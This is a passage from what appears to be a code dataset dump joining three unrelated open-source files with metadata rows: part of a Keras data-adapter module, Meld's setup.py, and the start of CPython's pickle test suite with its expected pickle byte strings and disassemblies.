def steps(self):
"""Yields steps for the current epoch."""
self._current_step = 0
# `self._inferred_steps` can be changed by `catch_stop_iteration`.
while (self._inferred_steps is None or
self._current_step < self._inferred_steps):
if self._insufficient_data: # Set by `catch_stop_iteration`.
break
can_run_full_execution = (
self._steps_per_execution_value == 1 or
self._inferred_steps is None or
self._inferred_steps - self._current_step >=
self._steps_per_execution_value)
if can_run_full_execution:
self._step_increment = self._steps_per_execution_value - 1
yield self._current_step
self._current_step += self._steps_per_execution_value
else:
# Last partial execution.
steps_remaining = self._inferred_steps - self._current_step
self._steps_per_execution.assign(steps_remaining)
self._step_increment = steps_remaining - 1
yield self._current_step
self._current_step += steps_remaining
self._steps_per_execution.assign(self._steps_per_execution_value)
@property
def step_increment(self):
"""The number to increment the step for `on_batch_end` methods."""
return self._step_increment
@property
def inferred_steps(self):
"""The inferred steps per epoch of the created `Dataset`.
This will be `None` in the case where:
(1) A `Dataset` of unknown cardinality was passed to the `DataHandler`, and
(2) `steps_per_epoch` was not provided, and
(3) The first epoch of iteration has not yet completed.
Returns:
The inferred steps per epoch of the created `Dataset`.
"""
return self._inferred_steps
@property
def should_sync(self):
# Catch OutOfRangeError for Datasets of unknown size.
# This blocks until the batch has finished executing.
# TODO(b/150292341): Allow multiple async steps here.
return self._inferred_steps is None
def _infer_steps(self, steps, dataset):
"""Infers steps_per_epoch needed to loop through a dataset."""
if steps is not None:
return steps
adapter_steps = self._adapter.get_size()
if adapter_steps is not None:
return adapter_steps
size = cardinality.cardinality(dataset)
if size == cardinality.INFINITE and steps is None:
raise ValueError("When passing an infinitely repeating dataset, you "
"must specify how many steps to draw.")
if size >= 0:
return size.numpy().item()
return None
@property
def _samples(self):
return self._adapter.get_samples()
def _validate_data_handler(self):
# TODO(b/152094471): Support this with DistIter.get_next_as_optional.
if self._steps_per_execution_value > 1 and self._inferred_steps is None:
raise ValueError(
"Could not infer the size of the data. With "
"`steps_per_execution > 1`, you must specify the number of steps "
"to run.")
def resolve_logs(self, logs):
return logs
class _ClusterCoordinatorDataHandler(DataHandler):
"""A `DataHandler` that is compatible with `ClusterCoordinator`."""
def _verify_data_adapter_compatibility(self, adapter_cls):
if adapter_cls != DatasetCreatorAdapter:
raise NotImplementedError("Only `DatasetCreator` input is supported in "
"`ParameterServerStrategy` at this time.")
def _configure_dataset_and_inferred_steps(self, strategy, x, steps_per_epoch,
class_weight, distribute):
if not isinstance(x, dataset_creator.DatasetCreator):
raise TypeError("When using `ParameterServerStrategy`, `x` must be a "
"`DatasetCreator`.")
def per_worker_dataset_fn():
return strategy.distribute_datasets_from_function(x)
self._dataset = self._model._cluster_coordinator.create_per_worker_dataset( # pylint: disable=protected-access
per_worker_dataset_fn)
if steps_per_epoch is None:
raise ValueError(
"`steps_per_epoch` must be specified with `ParameterServerStrategy`.")
self._inferred_steps = steps_per_epoch
def sync(self):
self._model._cluster_coordinator.join() # pylint: disable=protected-access
def resolve_logs(self, logs):
return logs.fetch()
def get_data_handler(*args, **kwargs):
if getattr(kwargs["model"], "_cluster_coordinator", None):
return _ClusterCoordinatorDataHandler(*args, **kwargs)
return DataHandler(*args, **kwargs)
def _make_class_weight_map_fn(class_weight):
"""Applies class weighting to a `Dataset`.
The `Dataset` is assumed to be in format `(x, y)` or `(x, y, sw)`, where
`y` must be a single `Tensor`.
Args:
class_weight: A map where the keys are integer class ids and values are
the class weights, e.g. `{0: 0.2, 1: 0.6, 2: 0.3}`
Returns:
A function that can be used with `tf.data.Dataset.map` to apply class
weighting.
"""
class_ids = list(sorted(class_weight.keys()))
expected_class_ids = list(range(len(class_ids)))
if class_ids != expected_class_ids:
error_msg = (
"Expected `class_weight` to be a dict with keys from 0 to one less "
"than the number of classes, found {}").format(class_weight)
raise ValueError(error_msg)
class_weight_tensor = ops.convert_to_tensor_v2_with_dispatch(
[class_weight[int(c)] for c in class_ids])
def _class_weights_map_fn(*data):
"""Convert `class_weight` to `sample_weight`."""
x, y, sw = unpack_x_y_sample_weight(data)
if nest.is_nested(y):
raise ValueError(
"`class_weight` is only supported for Models with a single output.")
if y.shape.rank > 2:
raise ValueError("`class_weight` not supported for "
"3+ dimensional targets.")
y_classes = smart_cond.smart_cond(
y.shape.rank == 2 and backend.shape(y)[1] > 1,
lambda: backend.argmax(y, axis=1),
lambda: math_ops.cast(backend.reshape(y, (-1,)), dtypes.int64))
cw = array_ops.gather_v2(class_weight_tensor, y_classes)
if sw is not None:
cw = math_ops.cast(cw, sw.dtype)
sw, cw = expand_1d((sw, cw))
# `class_weight` and `sample_weight` are multiplicative.
sw = sw * cw
else:
sw = cw
return x, y, sw
return _class_weights_map_fn
def expand_1d(data):
"""Expands 1-dimensional `Tensor`s into 2-dimensional `Tensor`s."""
def _expand_single_1d_tensor(t):
# Leaves `CompositeTensor`s as-is.
if (isinstance(t, ops.Tensor) and
isinstance(t.shape, tensor_shape.TensorShape) and t.shape.rank == 1):
return array_ops.expand_dims_v2(t, axis=-1)
return t
return nest.map_structure(_expand_single_1d_tensor, data)
def train_validation_split(arrays, validation_split):
"""Split arrays into train and validation subsets in deterministic order.
The last part of data will become validation data.
Args:
arrays: Tensors to split. Allowed inputs are arbitrarily nested structures
of Tensors and NumPy arrays.
validation_split: Float between 0 and 1. The proportion of the dataset to
include in the validation split. The rest of the dataset will be included
in the training split.
Returns:
`(train_arrays, validation_arrays)`
"""
def _can_split(t):
tensor_types = (ops.Tensor, np.ndarray)
if pd:
tensor_types = (ops.Tensor, np.ndarray, pd.Series, pd.DataFrame)
return isinstance(t, tensor_types) or t is None
flat_arrays = nest.flatten(arrays)
unsplitable = [type(t) for t in flat_arrays if not _can_split(t)]
if unsplitable:
raise ValueError(
"`validation_split` is only supported for Tensors or NumPy "
"arrays, found following types in the input: {}".format(unsplitable))
if all(t is None for t in flat_arrays):
return arrays, arrays
first_non_none = None
for t in flat_arrays:
if t is not None:
first_non_none = t
break
# Assumes all arrays have the same batch shape or are `None`.
batch_dim = int(first_non_none.shape[0])
split_at = int(math.floor(batch_dim * (1. - validation_split)))
if split_at == 0 or split_at == batch_dim:
raise ValueError(
"Training data contains {batch_dim} samples, which is not sufficient "
"to split it into a validation and training set as specified by "
"`validation_split={validation_split}`. Either provide more data, or a "
"different value for the `validation_split` argument." .format(
batch_dim=batch_dim, validation_split=validation_split))
def _split(t, start, end):
if t is None:
return t
return t[start:end]
train_arrays = nest.map_structure(
functools.partial(_split, start=0, end=split_at), arrays)
val_arrays = nest.map_structure(
functools.partial(_split, start=split_at, end=batch_dim), arrays)
return train_arrays, val_arrays
@keras_export("keras.utils.unpack_x_y_sample_weight", v1=[])
def unpack_x_y_sample_weight(data):
"""Unpacks user-provided data tuple.
This is a convenience utility to be used when overriding
`Model.train_step`, `Model.test_step`, or `Model.predict_step`.
This utility makes it easy to support data of the form `(x,)`,
`(x, y)`, or `(x, y, sample_weight)`.
Standalone usage:
>>> features_batch = tf.ones((10, 5))
>>> labels_batch = tf.zeros((10, 5))
>>> data = (features_batch, labels_batch)
>>> # `y` and `sample_weight` will default to `None` if not provided.
>>> x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data)
>>> sample_weight is None
True
Example in overridden `Model.train_step`:
```python
class MyModel(tf.keras.Model):
def train_step(self, data):
# If `sample_weight` is not provided, all samples will be weighted
# equally.
x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data)
with tf.GradientTape() as tape:
y_pred = self(x, training=True)
loss = self.compiled_loss(
y, y_pred, sample_weight, regularization_losses=self.losses)
trainable_variables = self.trainable_variables
gradients = tape.gradient(loss, trainable_variables)
self.optimizer.apply_gradients(zip(gradients, trainable_variables))
self.compiled_metrics.update_state(y, y_pred, sample_weight)
return {m.name: m.result() for m in self.metrics}
```
Args:
data: A tuple of the form `(x,)`, `(x, y)`, or `(x, y, sample_weight)`.
Returns:
The unpacked tuple, with `None`s for `y` and `sample_weight` if they are not
provided.
"""
if not isinstance(data, tuple):
return (data, None, None)
elif len(data) == 1:
return (data[0], None, None)
elif len(data) == 2:
return (data[0], data[1], None)
elif len(data) == 3:
return (data[0], data[1], data[2])
else:
error_msg = ("Data is expected to be in format `x`, `(x,)`, `(x, y)`, "
"or `(x, y, sample_weight)`, found: {}").format(data)
raise ValueError(error_msg)
@keras_export("keras.utils.pack_x_y_sample_weight", v1=[])
def pack_x_y_sample_weight(x, y=None, sample_weight=None):
"""Packs user-provided data into a tuple.
This is a convenience utility for packing data into the tuple formats
that `Model.fit` uses.
Standalone usage:
>>> x = tf.ones((10, 1))
>>> data = tf.keras.utils.pack_x_y_sample_weight(x)
>>> isinstance(data, tf.Tensor)
True
>>> y = tf.ones((10, 1))
>>> data = tf.keras.utils.pack_x_y_sample_weight(x, y)
>>> isinstance(data, tuple)
True
>>> x, y = data
Args:
x: Features to pass to `Model`.
y: Ground-truth targets to pass to `Model`.
sample_weight: Sample weight for each element.
Returns:
Tuple in the format used in `Model.fit`.
"""
if y is None:
# For single x-input, we do no tuple wrapping since in this case
# there is no ambiguity. This also makes NumPy and Dataset
# consistent in that the user does not have to wrap their Dataset
# data in an unecessary tuple
if not nest.is_nested(x):
return x
else:
return (x,)
elif sample_weight is None:
return (x, y)
else:
return (x, y, sample_weight)
def single_batch_iterator(strategy,
x,
y=None,
sample_weight=None,
class_weight=None):
"""Creates a single-batch dataset."""
x, y, sample_weight = _process_tensorlike((x, y, sample_weight))
if y is None:
data = (x,)
elif sample_weight is None:
data = (x, y)
else:
data = (x, y, sample_weight)
_check_data_cardinality(data)
dataset = dataset_ops.DatasetV2.from_tensors(data)
if class_weight:
dataset = dataset.map(_make_class_weight_map_fn(class_weight))
dataset = strategy.experimental_distribute_dataset(dataset)
return iter(dataset)
def _check_data_cardinality(data):
num_samples = set(int(i.shape[0]) for i in nest.flatten(data))
if len(num_samples) > 1:
msg = "Data cardinality is ambiguous:\n"
for label, single_data in zip(["x", "y", "sample_weight"], data):
msg += " {} sizes: {}\n".format(
label, ", ".join(str(i.shape[0]) for i in nest.flatten(single_data)))
msg += "Make sure all arrays contain the same number of samples."
raise ValueError(msg)
def _scipy_sparse_to_sparse_tensor(t):
"""Converts a SciPy sparse matrix to a SparseTensor."""
sparse_coo = t.tocoo()
row, col = sparse_coo.row, sparse_coo.col
data, shape = sparse_coo.data, sparse_coo.shape
if issubclass(data.dtype.type, np.floating):
data = data.astype(backend.floatx())
indices = np.concatenate(
(np.expand_dims(row, axis=1), np.expand_dims(col, axis=1)), axis=1)
return sparse_tensor.SparseTensor(indices, data, shape)
def _is_distributed_dataset(ds):
return isinstance(ds, input_lib.DistributedDatasetInterface)
| apache-2.0 | -7,670,201,060,302,608,000 | 33.778044 | 115 | 0.658404 | false |
aularon/meld | setup.py | 1 | 2104 | #!/usr/bin/env python
from distutils.core import setup
import glob
import platform
import sys
import meld.build_helpers
import meld.conf
if (platform.system() == 'Linux' and
platform.linux_distribution()[0] == 'Ubuntu'):
sys.argv.append('--install-layout=deb')
setup(
name=meld.conf.__package__,
version=meld.conf.__version__,
description='Visual diff and merge tool',
author='Kai Willadsen',
author_email='[email protected]',
url='http://meldmerge.org',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: X11 Applications :: GTK',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
'Programming Language :: Python',
'Topic :: Desktop Environment :: Gnome',
'Topic :: Software Development',
'Topic :: Software Development :: Version Control',
],
packages=[
'meld',
'meld.ui',
'meld.util',
'meld.vc',
],
package_data={
'meld': ['README', 'COPYING', 'NEWS'],
'meld.vc': ['README', 'COPYING'],
},
scripts=['bin/meld'],
data_files=[
('share/man/man1',
['meld.1']
),
('share/doc/meld-' + meld.conf.__version__,
['COPYING', 'NEWS']
),
('share/meld',
['data/meld.css']
),
('share/meld/icons',
glob.glob("data/icons/*.png") +
glob.glob("data/icons/COPYING*")
),
('share/meld/ui',
glob.glob("data/ui/*.ui") + glob.glob("data/ui/*.xml")
),
],
cmdclass={
"build_i18n": meld.build_helpers.build_i18n,
"build_help": meld.build_helpers.build_help,
"build_icons": meld.build_helpers.build_icons,
"build_data": meld.build_helpers.build_data,
"build_py": meld.build_helpers.build_py,
"install_data": meld.build_helpers.install_data,
},
distclass=meld.build_helpers.MeldDistribution,
)
| gpl-2.0 | -8,133,816,327,684,232,000 | 28.222222 | 85 | 0.564639 | false |
mancoast/CPythonPyc_test | fail/312_pickletester.py | 1 | 42506 | import io
import unittest
import pickle
import pickletools
import copyreg
from http.cookies import SimpleCookie
from test.support import TestFailed, TESTFN, run_with_locale
from pickle import bytes_types
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
import __main__
__main__.C = C
C.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
# DATA0 .. DATA2 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\nac'
b'builtins\ncomplex\n'
b'p1\n(F3.0\nF0.0\ntp2\nRp'
b'3\naL1L\naL-1L\naL255L\naL-'
b'255L\naL-256L\naL65535L\na'
b'L-65535L\naL-65536L\naL2'
b'147483647L\naL-2147483'
b'647L\naL-2147483648L\na('
b'Vabc\np4\ng4\nccopyreg'
b'\n_reconstructor\np5\n('
b'c__main__\nC\np6\ncbu'
b'iltins\nobject\np7\nNt'
b'p8\nRp9\n(dp10\nVfoo\np1'
b'1\nL1L\nsVbar\np12\nL2L\nsb'
b'g9\ntp13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL 'builtins complex'
39: p PUT 1
42: ( MARK
43: F FLOAT 3.0
48: F FLOAT 0.0
53: t TUPLE (MARK at 42)
54: p PUT 2
57: R REDUCE
58: p PUT 3
61: a APPEND
62: L LONG 1
66: a APPEND
67: L LONG -1
72: a APPEND
73: L LONG 255
79: a APPEND
80: L LONG -255
87: a APPEND
88: L LONG -256
95: a APPEND
96: L LONG 65535
104: a APPEND
105: L LONG -65535
114: a APPEND
115: L LONG -65536
124: a APPEND
125: L LONG 2147483647
138: a APPEND
139: L LONG -2147483647
153: a APPEND
154: L LONG -2147483648
168: a APPEND
169: ( MARK
170: V UNICODE 'abc'
175: p PUT 4
178: g GET 4
181: c GLOBAL 'copyreg _reconstructor'
205: p PUT 5
208: ( MARK
209: c GLOBAL '__main__ C'
221: p PUT 6
224: c GLOBAL 'builtins object'
241: p PUT 7
244: N NONE
245: t TUPLE (MARK at 208)
246: p PUT 8
249: R REDUCE
250: p PUT 9
253: ( MARK
254: d DICT (MARK at 253)
255: p PUT 10
259: V UNICODE 'foo'
264: p PUT 11
268: L LONG 1
272: s SETITEM
273: V UNICODE 'bar'
278: p PUT 12
282: L LONG 2
286: s SETITEM
287: b BUILD
288: g GET 9
291: t TUPLE (MARK at 169)
292: p PUT 13
296: a APPEND
297: g GET 13
301: a APPEND
302: L LONG 5
306: a APPEND
307: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopyreg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06cbuiltins\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL 'builtins complex'
35: q BINPUT 1
37: ( MARK
38: G BINFLOAT 3.0
47: G BINFLOAT 0.0
56: t TUPLE (MARK at 37)
57: q BINPUT 2
59: R REDUCE
60: q BINPUT 3
62: K BININT1 1
64: J BININT -1
69: K BININT1 255
71: J BININT -255
76: J BININT -256
81: M BININT2 65535
84: J BININT -65535
89: J BININT -65536
94: J BININT 2147483647
99: J BININT -2147483647
104: J BININT -2147483648
109: ( MARK
110: X BINUNICODE 'abc'
118: q BINPUT 4
120: h BINGET 4
122: c GLOBAL 'copyreg _reconstructor'
146: q BINPUT 5
148: ( MARK
149: c GLOBAL '__main__ C'
161: q BINPUT 6
163: c GLOBAL 'builtins object'
180: q BINPUT 7
182: N NONE
183: t TUPLE (MARK at 148)
184: q BINPUT 8
186: R REDUCE
187: q BINPUT 9
189: } EMPTY_DICT
190: q BINPUT 10
192: ( MARK
193: X BINUNICODE 'foo'
201: q BINPUT 11
203: K BININT1 1
205: X BINUNICODE 'bar'
213: q BINPUT 12
215: K BININT1 2
217: u SETITEMS (MARK at 192)
218: b BUILD
219: h BINGET 9
221: t TUPLE (MARK at 109)
222: q BINPUT 13
224: h BINGET 13
226: K BININT1 5
228: e APPENDS (MARK at 3)
229: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'foo'
153: q BINPUT 8
155: K BININT1 1
157: X BINUNICODE 'bar'
165: q BINPUT 9
167: K BININT1 2
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA3 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA4 = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA5 = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA6 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
_testdata = create_data()
def setUp(self):
pass
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assertEqual(expected, got)
def test_load_from_data0(self):
self.assertEqual(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assertEqual(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assertEqual(self._testdata, self.loads(DATA2))
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def test_recursive_list(self):
l = []
l.append(l)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertEqual(len(x), 1)
self.assertTrue(x is x[0])
def test_recursive_tuple(self):
t = ([],)
t[0].append(t)
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertEqual(len(x), 1)
self.assertEqual(len(x[0]), 1)
self.assertTrue(x is x[0][0])
def test_recursive_dict(self):
d = {}
d[1] = d
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertEqual(list(x.keys()), [1])
self.assertTrue(x[1] is x)
def test_recursive_inst(self):
i = C()
i.attr = i
for proto in protocols:
s = self.dumps(i, 2)
x = self.loads(s)
self.assertEqual(dir(x), dir(i))
self.assertTrue(x.attr is x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = C()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def test_get(self):
self.assertRaises(KeyError, self.loads, b'g0\np0')
self.assertEquals(self.loads(b'((Kdtp0\nh\x00l.))'), [(100,), (100,)])
def test_insecure_strings(self):
# XXX Some of these tests are temporarily disabled
insecure = [b"abc", b"2 + 2", # not quoted
## b"'abc' + 'def'", # not a single quoted string
b"'abc", # quote is not closed
b"'abc\"", # open quote and close quote don't match
b"'abc' ?", # junk after close quote
b"'\\'", # trailing backslash
# some tests of the quoting rules
## b"'abc\"\''",
## b"'\\\\a\'\'\'\\\'\\\\\''",
]
for b in insecure:
buf = b"S" + b + b"\012p0\012."
self.assertRaises(ValueError, self.loads, buf)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assertEqual(u2, u)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assertEqual(t2, t)
def test_bytes(self):
for proto in protocols:
for u in b'', b'xyz', b'xyz'*100:
p = self.dumps(u)
self.assertEqual(self.loads(p), u)
def test_ints(self):
import sys
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assertEqual(expected, n2)
n = n >> 1
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assertEqual(got, maxint64)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.assertRaises(ValueError, self.loads, data)
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assertEqual(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assertEqual(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
pass
def test_getinitargs(self):
pass
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assertEqual(t, u)
if hasattr(os, "stat"):
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assertEqual(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assertEqual(t, u)
# Tests for protocol 2
def test_proto(self):
build_none = pickle.NONE + pickle.STOP
for proto in protocols:
expected = build_none
if proto >= 2:
expected = pickle.PROTO + bytes([proto]) + expected
p = self.dumps(None, proto)
self.assertEqual(p, expected)
oob = protocols[-1] + 1 # a future protocol
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as detail:
self.assertTrue(str(detail).startswith(
"unsupported pickle protocol"))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
